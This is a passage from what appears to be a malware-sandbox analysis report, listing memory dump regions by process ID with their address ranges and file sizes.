                                                                                                                                                                                          • memory/4048-133-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            100KB

                                                                                                                                                                                          • memory/4048-130-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            572KB

                                                                                                                                                                                          • memory/4048-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4048-136-0x0000000000400000-0x000000000051E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.1MB

                                                                                                                                                                                          • memory/4048-137-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            100KB

                                                                                                                                                                                          • memory/4048-135-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            100KB

                                                                                                                                                                                          • memory/4048-134-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            152KB

                                                                                                                                                                                          • memory/4048-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.5MB

                                                                                                                                                                                          • memory/4048-131-0x0000000064940000-0x0000000064959000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            100KB

                                                                                                                                                                                          • memory/4108-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4112-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4120-225-0x00000000001B0000-0x00000000001B1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4120-247-0x0000000009E60000-0x0000000009E98000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            224KB

                                                                                                                                                                                          • memory/4120-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4120-239-0x0000000000A60000-0x0000000000A61000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4120-252-0x0000000000A70000-0x0000000000A71000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4120-271-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4132-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4184-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4192-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4192-234-0x00000000011A0000-0x00000000011A1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4192-224-0x0000000000A50000-0x0000000000A51000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4192-265-0x0000000007990000-0x00000000079CF000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            252KB

                                                                                                                                                                                          • memory/4216-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4224-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4240-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4260-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4308-337-0x00000000778A0000-0x0000000077A2E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.6MB

                                                                                                                                                                                          • memory/4308-344-0x00000000051B0000-0x00000000051B1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4308-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4336-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4340-357-0x0000000000417E8A-mapping.dmp
                                                                                                                                                                                          • memory/4652-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4652-351-0x0000000000400000-0x00000000009C0000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            5.8MB

                                                                                                                                                                                          • memory/4652-350-0x0000000000B40000-0x0000000000B6F000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            188KB

                                                                                                                                                                                          • memory/4716-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4856-292-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4856-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4872-348-0x00000000033B0000-0x00000000033B1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4872-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4872-342-0x00000000778A0000-0x0000000077A2E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.6MB

                                                                                                                                                                                          • memory/4904-346-0x0000000005590000-0x0000000005591000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4904-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4908-352-0x0000000000418392-mapping.dmp
                                                                                                                                                                                          • memory/4920-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4924-347-0x00000000778A0000-0x0000000077A2E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.6MB

                                                                                                                                                                                          • memory/4924-349-0x0000000002CB0000-0x0000000002CB1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/4924-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4944-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4944-339-0x0000000003320000-0x0000000003396000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            472KB

                                                                                                                                                                                          • memory/4948-334-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5012-294-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5016-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5016-343-0x0000000004C30000-0x0000000004C31000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/5016-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5036-356-0x00000000072C2000-0x00000000072C3000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/5036-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5036-355-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            188KB

                                                                                                                                                                                          • memory/5044-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5056-340-0x0000000002950000-0x0000000002951000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/5056-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5064-341-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/5064-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5088-353-0x0000000000417E8E-mapping.dmp
                                                                                                                                                                                          • memory/5104-318-0x0000000000000000-mapping.dmp